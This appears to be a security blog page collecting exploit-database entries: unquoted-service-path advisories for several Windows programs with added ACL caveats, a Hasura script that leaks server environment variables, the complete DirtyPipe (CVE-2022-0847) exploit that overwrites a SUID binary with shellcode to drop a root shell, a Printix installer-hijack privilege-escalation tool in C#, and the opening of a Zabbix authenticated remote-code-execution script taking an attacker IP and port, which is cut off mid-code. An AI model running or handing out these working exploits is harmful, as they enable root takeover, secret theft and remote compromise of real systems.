Contributors to this blog: HireHackking

About this blog

Hacking techniques include penetration testing, network security, reverse engineering, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cloudflare.com/
# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
# Version: 1.4.107
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc CloudflareWARP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CloudflareWARP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cloudflare WARP
        DEPENDENCIES       : wlansvc
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Concretely: because BINARY_PATH_NAME is unquoted and contains spaces, the service control manager's CreateProcess call tries C:\Program.exe and then C:\Program Files\Cloudflare\Cloudflare.exe before it reaches warp-svc.exe. A binary planted at either location runs as LocalSystem the next time the service starts (AUTO_START, so at every boot). On a default Windows installation neither C:\ nor C:\Program Files\Cloudflare allows standard users to create files, so the finding is only exploitable where those ACLs have been loosened; check them with icacls before reporting this as a privilege escalation.
            
# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
# Date: 04/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.privateinternetaccess.com
# Software Link: https://www.privateinternetaccess.com/download
# Version: 3.3.0.100
# Tested: Windows 10 x64
# Contact: https://twitter.com/dmaral3noz

# Step to discover Unquoted Service Path:

C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname

DisplayName                      Name                          PathName                                                    StartMode  StartName
Private Internet Access Service  PrivateInternetAccessService  "C:\Program Files\Private Internet Access\pia-service.exe"  Auto       LocalSystem

# Service info:

C:\Users\saudh>sc qc PrivateInternetAccessService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PrivateInternetAccessService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Private Internet Access\pia-service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Private Internet Access Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Note that the BINARY_PATH_NAME captured above is already enclosed in double quotes, so as shown it does not exhibit the unquoted-path condition: the service control manager resolves a quoted module name exactly and there is no C:\Program.exe hijack point to plant. Re-run sc qc against the installed build and confirm the path is really unquoted before treating this as a finding.
            
# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu

import requests

SERVER_ADDR = 'x.x.x.x'   # host[:port] of the Hasura instance

url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

# If the instance was started with HASURA_GRAPHQL_ADMIN_SECRET, the metadata API
# demands the matching secret; without it the requests below come back 401/403.
headers = {}   # e.g. {'x-hasura-admin-secret': '...'}

print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:
        continue

    # add_remote_schema resolves url_from_env on the server; when the variable's
    # value is not a valid URI, the error message echoes that value back verbatim.
    payload = {
        "type": "bulk",
        "source": "",
        "args": [
            {
                "type": "add_remote_schema",
                "args": {
                    "name": "ttt",
                    "definition": {
                        "timeout_seconds": 60,
                        "forward_client_headers": False,
                        "headers": [],
                        "url_from_env": env_var
                    },
                    "comment": ""
                }
            }
        ],
        "resource_version": 2
    }
    r = requests.post(url, json=payload, headers=headers, timeout=10)
    try:
        body = r.json()
    except ValueError:
        print('Non-JSON response (HTTP {}): {}'.format(r.status_code, r.text[:200]))
        continue

    error = body.get('error', '')
    if 'not a valid URI:' in error:
        print(error.split('not a valid URI:', 1)[1].strip())
    else:
        # Unset variable, or a value that is itself a valid URI: nothing is echoed.
        print('Could not parse out VAR, dumping error as is')
        print(error or 'N/A')
            
# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.malwarebytes.com/
# Software Link: https://www.malwarebytes.com/mwb-download/
# Version: 4.5.0
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc MBAMService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MBAMService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Malwarebytes Service
        DEPENDENCIES       : RPCSS
                           : WINMGMT
        SERVICE_START_NAME : LocalSystem



#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Here the only path component containing whitespace is "Program Files", so the single location Windows would try before MBAMService.exe is C:\Program.exe. Standard users cannot create files in C:\ by default, so this needs a weakened root ACL to be exploitable.
            

Foxit PDF Reader 11.0 - Unquoted Service Path

# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.foxit.com/pdf-reader/
# Software Link: https://www.foxit.com/downloads/#Foxit-Reader/
# Version: 11.0.1.49938
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc FoxitReaderUpdateService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitReaderUpdateService
        TYPE               : 110  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Foxit PDF Reader Update Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

This path has four whitespace-separated breaks, so Windows would try five locations before the real binary: C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Foxit.exe, C:\Program Files (x86)\Foxit Software\Foxit.exe and C:\Program Files (x86)\Foxit Software\Foxit PDF.exe. All of the parent directories are admin-only on a default installation; verify their ACLs with icacls.
// Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)
// Exploit Author: blasty (peter@haxx.in)
// Original Author: Max Kellermann (max.kellermann@ionos.com)
// CVE: CVE-2022-0847

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <stdint.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

// small (linux x86_64) ELF file matroshka doll that does;
//   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
//   write(fd, elfcode, elfcode_len)
//   chmod("/tmp/sh", 04755)
//   close(fd);
//   exit(0);
//
// the dropped ELF simply does:
//   setuid(0);
//   setgid(0);
//   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
//
// the leading 0x7f is commented out because the exploit writes from
// offset 1: the target's own first byte (0x7f of its ELF magic) is kept.
unsigned char elfcode[] = {
	/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00,
	0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7,
	0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00, 0x00, 0x00,
	0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x48, 0x8d, 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
	0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x73, 0x68, 0x00,
	0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
	0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6,
	0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05,
	0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
};

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int hax(char *filename, long offset, uint8_t *data, size_t len)
{
	/* open the input file and validate the specified offset */
	const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return -1;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return -1;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return -1;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return -1;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, len);
	if (nbytes < 0) {
		perror("write failed");
		return -1;
	}
	if ((size_t)nbytes < len) {
		fprintf(stderr, "short write\n");
		return -1;
	}

	close(fd);

	return 0;
}

int main(int argc, char **argv)
{
	if (argc != 2) {
		fprintf(stderr, "Usage: %s SUID\n", argv[0]);
		return EXIT_FAILURE;
	}

	char *path = argv[1];

	/* keep a copy of the bytes we are about to clobber so the
	   target binary can be restored afterwards */
	int fd = open(path, O_RDONLY);
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}
	uint8_t *orig_bytes = malloc(sizeof(elfcode));
	lseek(fd, 1, SEEK_SET);
	read(fd, orig_bytes, sizeof(elfcode));
	close(fd);

	printf("[+] hijacking suid binary..\n");
	if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
		printf("[~] failed\n");
		return EXIT_FAILURE;
	}

	printf("[+] dropping suid shell..\n");
	system(path);

	printf("[+] restoring suid binary..\n");
	if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
		printf("[~] failed\n");
		return EXIT_FAILURE;
	}

	printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
	system("/tmp/sh");

	return EXIT_SUCCESS;
}
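Before running the PoC above, a practitioner usually wants a quick triage of whether a given kernel is even in the affected range. The helper below is an added editorial example, not part of the PoC or of Max Kellermann's writeup. The mainline range (5.8 up to, but not including, 5.16.11) comes from the header above; the 5.15.25 and 5.10.102 stable backport versions are taken from the upstream fix announcements and are not stated on this page.

```python
import re

# Upstream releases that ship the CVE-2022-0847 fix, per stable branch. Only the
# mainline bound is given by the PoC header; the 5.15 and 5.10 backports are from
# the upstream stable announcements.
FIRST_AFFECTED = (5, 8, 0)
FIXED_IN = {
    (5, 16): (5, 16, 11),
    (5, 15): (5, 15, 25),
    (5, 10): (5, 10, 102),
}


def parse_kernel_release(release):
    """Parse a `uname -r` string ('5.10.0-13-amd64', '5.16.10+') into (major, minor, patch)."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def dirty_pipe_status(release):
    """Classify a kernel release string against the CVE-2022-0847 fix versions."""
    ver = parse_kernel_release(release)
    if ver < FIRST_AFFECTED:
        return "not affected"          # splice path not reachable before f6dd975583bd
    if re.search(r"-rc\d", release):
        return "release candidate: check the changelog"   # 5.17-rcN straddles the fix
    branch = ver[:2]
    if branch in FIXED_IN:
        return "fixed" if ver >= FIXED_IN[branch] else "vulnerable"
    if ver >= (5, 17, 0):
        return "fixed"                 # every release from 5.17 onward carries the fix
    # 5.8, 5.9 and 5.11-5.14 were end-of-life before the fix: no upstream fix release exists
    return "vulnerable unless the distribution backported the fix"


if __name__ == "__main__":
    import platform
    if platform.system() != "Linux":
        print("not a Linux kernel")
    else:
        rel = platform.release()
        print(f"{rel}: {dirty_pipe_status(rel)}")
```

Treat the verdict as a first pass only. Distribution kernels keep an ABI-style version string while backporting fixes (Debian's `5.10.0-13-amd64`, for instance, is really a 5.10.10x kernel), so "vulnerable" by version must be confirmed against the distribution's CVE tracker, or by running the original `write_anything` PoC against a throwaway file you own rather than a SUID binary.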

Printix Client 1.3.1106.0 - Privilege Escalation

# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
# Date: 3/2/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25090
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090

Summary of the technique, as read from the code below (the advisory itself carries no description): the tool locates the cached Printix MSI under C:\Windows\Installer by its "Printix" author property and launches it as the current user. While the installer runs, a background thread polls the user's %TEMP% for msiwrapper.ini files and rewrites their SetupFileName entry to point at the attacker-supplied payload, so the wrapped setup that the elevated installer subsequently executes is the payload rather than the real Printix setup.

using System;
using System.Runtime.InteropServices;
using System.Drawing;
using System.Reflection;
using System.Threading;
using System.IO;
using System.Text;
using System.Resources;
using System.Diagnostics;

//Assembly COM for transparent creation of the application.
//End of Assembly COM For Transparent Creation usage.

public class Program
{
    //Initiator class for the program, the program starts on the main method.
    public static void Main(string[] args)
    {
        //Console.SetWindowSize(120,30);
        //Console.SetBufferSize(120,30);
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Console.WriteLine("├ oo dP dP ");
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("├ 88 88 ");
        Console.ForegroundColor = ConsoleColor.Green;
        Console.WriteLine("├ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.WriteLine("├ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 ");
        Console.ForegroundColor = ConsoleColor.Yellow;
        Console.WriteLine("├ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 ");
        Console.ForegroundColor = ConsoleColor.Magenta;
        Console.WriteLine("├ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' ");
        Console.WriteLine("├ 88 ");
        Console.WriteLine("├ dP ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.Write("├ For ");
        Console.ForegroundColor = ConsoleColor.Magenta;
        Console.Write("Printix ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.Write("Services Designed By Logan Latvala\n");
        Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Thread.Sleep(3000);

        string filesH = "";
        Console.WriteLine("Drag and drop a payload onto this application for execution.");
        try
        {
            if (args[0]?.Length > 0)
            {
                Console.WriteLine("File Added: " + args[0]);
            }
        }
        catch (Exception e)
        {
            Console.WriteLine("You're missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine(e);
            Console.ReadLine();
            Environment.Exit(40);
        }

        Console.WriteLine("\n We're going to look for your printix installer, one moment...");
        string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);
        double mCheck = 1.00;
        string trueInstaller = "";

        //Starts to enumerate window's installer directory for an author with the name of printix.
        foreach (string path in installerSearch)
        {
            Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
            Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
            if (readFileProperties(path, "Printix"))
            {
                trueInstaller = path;
                Console.WriteLine("We've found your installer, we'll finish enumeration.");
                goto MGMA;
            }
            mCheck++;
        }

    //Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
    MGMA:
        if (trueInstaller == "")
        {
            Console.WriteLine("We can't find your installer, you are not vulnerable.");
            Thread.Sleep(2000);
            Environment.Exit(12);
        }
        Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Console.WriteLine("├ We are starting to enumerate your temporary directory.");
        Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");

        //Start a new thread here for enumeration.
        Thread t = new Thread(() => newTempThread(filesH, args));
        t.Start();
        Process.Start(trueInstaller);
        Console.WriteLine("All done.");
        Console.ReadLine();
    }

    public static void newTempThread(string filesH, string[] args)
    {
        while (true)
        {
            try
            {
                //Starts the inheriting process for printix, in which scans for the files and relays their contents.
                string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
                //Nothing to do yet: the installer has not written its ini file. Keep polling instead of
                //throwing on files[0], which would land in the catch below and block on ReadLine.
                if (files.Length == 0)
                {
                    Thread.Sleep(20);
                    continue;
                }
                foreach (string fl in files)
                {
                    if (!filesH.Contains(fl))
                    {
                        //filesH += " " + fl;
                        string[] fileText = File.ReadAllLines(fl);
                        int linerc = 0;
                        foreach (string liners in fileText)
                        {
                            if (liners.Contains("SetupFileName"))
                            {
                                //Most likely the temporary directory for setup, which presents it properly.
                                Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
                                Console.WriteLine("├ " + fl);
                                fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
                                Console.WriteLine("├ " + fileText[linerc] + "");
                                Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
                                Console.WriteLine("│");
                                filesH += " " + fl;
                                File.WriteAllText(fl, string.Empty);
                                File.WriteAllLines(fl, fileText);
                            }
                            linerc++;
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("There was an error, try re-running the program. \n" + e);
                Console.ReadLine();
            }
            Thread.Sleep(20);
        }
    }

    public static bool readFileProperties(string file, string filter)
    {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
        startInfo.UseShellExecute = false;
        startInfo.RedirectStandardOutput = true;
        startInfo.FileName = "CMD.exe";
        startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
        process.StartInfo = startInfo;
        process.Start();
        string output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();
        if (output.Contains(filter))
        {
            return true;
        }
        else
        {
            return false;
        }
        //wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
    }
}
# Exploit Title: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path
# Discovery by: Mohamed Alzhrani
# Discovery Date: 2022-03-08
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/drfone_full3360.exe
# Tested Version: 12.0.18
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\Users\0xMaz>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Wondershare Install Assist Service  Wondershare InstallAssist  C:\ProgramData\Wondershare\Service\InstallAssistService.exe  Auto

# Service info:

C:\Users\0xMaz>sc qc "Wondershare InstallAssist"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Wondershare InstallAssist
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\ProgramData\Wondershare\Service\InstallAssistService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Install Assist Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A local user who is able to insert their code in the system root path undetected by the OS or other security applications could potentially have it executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Note that the path shown contains no whitespace at all. The wmic filter above only reports that the value is unquoted; the search ambiguity that defines an unquoted service path (CWE-428) needs a space in the path, and there is none here, so Windows has no alternative location to try. Exploitation would instead depend on a standard user being able to replace InstallAssistService.exe or write into C:\ProgramData\Wondershare\Service, which is a directory-permission question this advisory does not examine (icacls on that directory answers it).
# Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege
# Date: 09/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.mcafee.com/
# Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html
# Version: 2.13
# Tested: Windows 10 x64
# Contact: https://twitter.com/dmaral3noz

C:\Users\saudh>sc qc SafeConnectService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SafeConnectService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : McAfee Safe Connect Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Locations Windows would try before the real binary: C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\McAfee\McAfee.exe and C:\Program Files (x86)\McAfee\McAfee Safe.exe. All four parent directories are admin-only by default; check their ACLs with icacls before treating this as exploitable.

Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)

# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/3/2022
# Exploit Author: Hussien Misbah
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn5.0.17
# Version: 5.0.17
# Tested on: Linux
# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit

#!/usr/bin/python3
# note : this is blind RCE so don't expect to see results on the site
# this exploit is tested against Zabbix 5.0.17 only
#
# Preconditions: the account must be allowed to create items on the host (an
# Admin or Super Admin with write access to it), and the host's Zabbix agent must
# permit the system.run key (EnableRemoteCommands=1 on older agents,
# AllowKey=system.run[*] on agent 5.0 and later). If the agent denies the key,
# the item simply becomes "Not supported" and no connection arrives.

import sys
import requests
import re
import random
import string
import colorama
from colorama import Fore

print(Fore.YELLOW + "[*] this exploit is tested against Zabbix 5.0.17 only")
print(Fore.YELLOW + "[*] can reach the author @ https://hussienmisbah.github.io/")


def item_name():
    letters = string.ascii_letters
    item = ''.join(random.choice(letters) for i in range(20))
    return item


if len(sys.argv) != 6:
    print(Fore.RED + "[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>")
    sys.exit(-1)

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
host = sys.argv[4]
port = sys.argv[5]

s = requests.Session()
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
}
data = {
    "request": "hosts.php",
    "name": username,
    "password": password,
    "autologin": "1",
